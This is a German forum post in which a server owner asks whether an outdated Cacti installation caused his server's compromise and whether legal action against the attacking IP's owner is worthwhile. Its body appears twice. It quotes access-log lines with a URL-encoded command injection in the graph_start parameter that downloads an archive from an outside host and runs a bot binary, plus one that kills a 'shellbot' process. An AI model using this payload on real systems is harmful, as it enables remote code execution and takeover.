Server gesperrt / DoS
Posted: 2005-08-03 20:39
Hi,
mein Server ist gesperrt worden, da von ihm DoS Angriffe ausgingen. Habe ihn heute entsperren lassen und die logs angeschaut. Folgende Zeilen tauchen in den logs oft auf:
208.7.141.2 - - [10/Jul/2005:14:44:08 +0200] "GET /cacti/graph_image.php?local_graph_id=15&graph_start=%0acd%20%2fvar%2ftmp%3bwget%20www.geocities.com%2fhackroot2000%2fza.tgz%3btar%20-zxvf%20za.tgz%3bcd%20za%3b.%2fzbind%0a HTTP/1.0" 200 173 "-" "-"
und mit
graph_start=%0akillall%20-9%20shellbot%0
Kann man definitiv sagen, dass die Bugs in der veralteten Cacti Version die Ursache für den erfolgreichen Angriff waren, oder ist das nur ein Versuch eine Datei auf dem Server auszuführen, der nicht unbedingt geglück ist?
Wie sieht es denn rechtlich aus? Wenn die ip zu einem deutschen Provider gehören würde, würde ich ohne zu überlegen Anzeige erstatten, aber laut whois gehört die ip zu "Harvest Meat Company" in den USA, National City, Californien. Hat es überhaupt Sinn da rechtliche Schritte zu unternehmen? Hat jemand schon mit sowas Erfahrung?
Für Infos wäre ich dankbar.
mein Server ist gesperrt worden, da von ihm DoS Angriffe ausgingen. Habe ihn heute entsperren lassen und die logs angeschaut. Folgende Zeilen tauchen in den logs oft auf:
208.7.141.2 - - [10/Jul/2005:14:44:08 +0200] "GET /cacti/graph_image.php?local_graph_id=15&graph_start=%0acd%20%2fvar%2ftmp%3bwget%20www.geocities.com%2fhackroot2000%2fza.tgz%3btar%20-zxvf%20za.tgz%3bcd%20za%3b.%2fzbind%0a HTTP/1.0" 200 173 "-" "-"
und mit
graph_start=%0akillall%20-9%20shellbot%0
Kann man definitiv sagen, dass die Bugs in der veralteten Cacti Version die Ursache für den erfolgreichen Angriff waren, oder ist das nur ein Versuch eine Datei auf dem Server auszuführen, der nicht unbedingt geglück ist?
Wie sieht es denn rechtlich aus? Wenn die ip zu einem deutschen Provider gehören würde, würde ich ohne zu überlegen Anzeige erstatten, aber laut whois gehört die ip zu "Harvest Meat Company" in den USA, National City, Californien. Hat es überhaupt Sinn da rechtliche Schritte zu unternehmen? Hat jemand schon mit sowas Erfahrung?
Für Infos wäre ich dankbar.